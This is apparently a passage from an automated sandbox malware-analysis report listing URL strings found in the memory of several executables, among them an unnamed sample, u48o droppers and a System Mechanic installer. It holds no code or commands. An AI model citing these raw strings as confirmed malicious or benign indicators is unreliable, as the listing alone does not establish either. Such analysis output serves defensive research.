                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.00000000024FB000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002500000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
                            Source: u48o.1.exe, 0000000E.00000003.1718956588.00000000025C4000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002526000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002589000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2675924617.00000256731F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/Uninstall.ashx
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://www.codeplex.com/CompositeWPF
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://www.codeplex.com/prism
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2521152454.0000025659B80000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://www.codeplex.com/prism#Microsoft.Practices.Prism.ViewModel
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000003.1718956588.0000000002582000.00000004.00001000.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.indyproject.org/
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.0000000004348000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.0000000003695000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.000000000525D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iolo.com/products/byepass/welcome/?utm_source=bp&utm_medium=product&p=d59cc353-e8e4-4f42-
                            Source: u48o.0.exe, u48o.0.exe, 0000000A.00000002.1716466376.000000006C26D000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                            Source: u48o.0.exe, 0000000A.00000002.1700957120.000000001E78A000.00000004.00000020.00020000.00000000.sdmp, u48o.0.exe, 0000000A.00000002.1716032425.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitor
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://dc.services.visualstudio.com/api/profiles/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://dc.services.visualstudio.com/f
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dc.services.visualstudio.com/v2/track
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.avira.com/download/
                            Source: u48o.1.exe, 0000000E.00000003.1718956588.0000000002544000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.46
                            Source: u48o.1.exe, 0000000E.00000003.1723626996.00000000009D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exeeeC
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676321887.0000025673230000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659FE2000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2620487343.0000025669C2C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnet
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676321887.0000025673230000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2620487343.0000025669C2C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://github.com/Microsoft/ApplicationInsights-dotnetw
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&l
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&m
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&o
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&r
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&s
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&v
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://github.com/itfoundry/Poppins)&&&&z
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://indiantypefoundry.com
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.azure-api.net/ent/v1
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666B
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://monitor.azure.com//.default
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.monitor.azure.com/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://profiler.monitor.azure.com/l
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rt.services.visualstudio.com/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://rt.services.visualstudio.com/l
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFL
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://scripts.sil.org/OFLThis
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2649497806.00000256725E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLV
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2692379137.0000025676C62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scripts.sil.org/OFLX8
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://scripts.sil.org/OFLhttps://indiantypefoundry.comNinad
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2658504863.0000025672980000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://snapshot.monitor.azure.com/&
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.000002565A0D0000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://support.iolo.com/support/solutions/articles/44001781185?
                            Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://taskscheduler.codeplex.com/H
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://webhooklistenersfunc.azurewebsites.net/api/lookup/constella-dark-web-alerts
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.mon
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2-2.in.applicationinsights.azure.com/v2/track
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://westus2.livediagnostics.monitor.azure.com/
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: u48o.0.exe, 0000000A.00000002.1688142273.00000000040DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.000002565A0D0000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://www.iolo.com/company/legal/eula/?
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://www.iolo.com/company/legal/privacy/?
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2660912817.0000025672AE0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: https://www.iolo.com/company/legal/sales-policy/?
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/
                            Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                            Source: u48o.0.exe, 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                            Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                            Source: u48o.0.exe, 0000000A.00000003.1458454264.0000000030895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
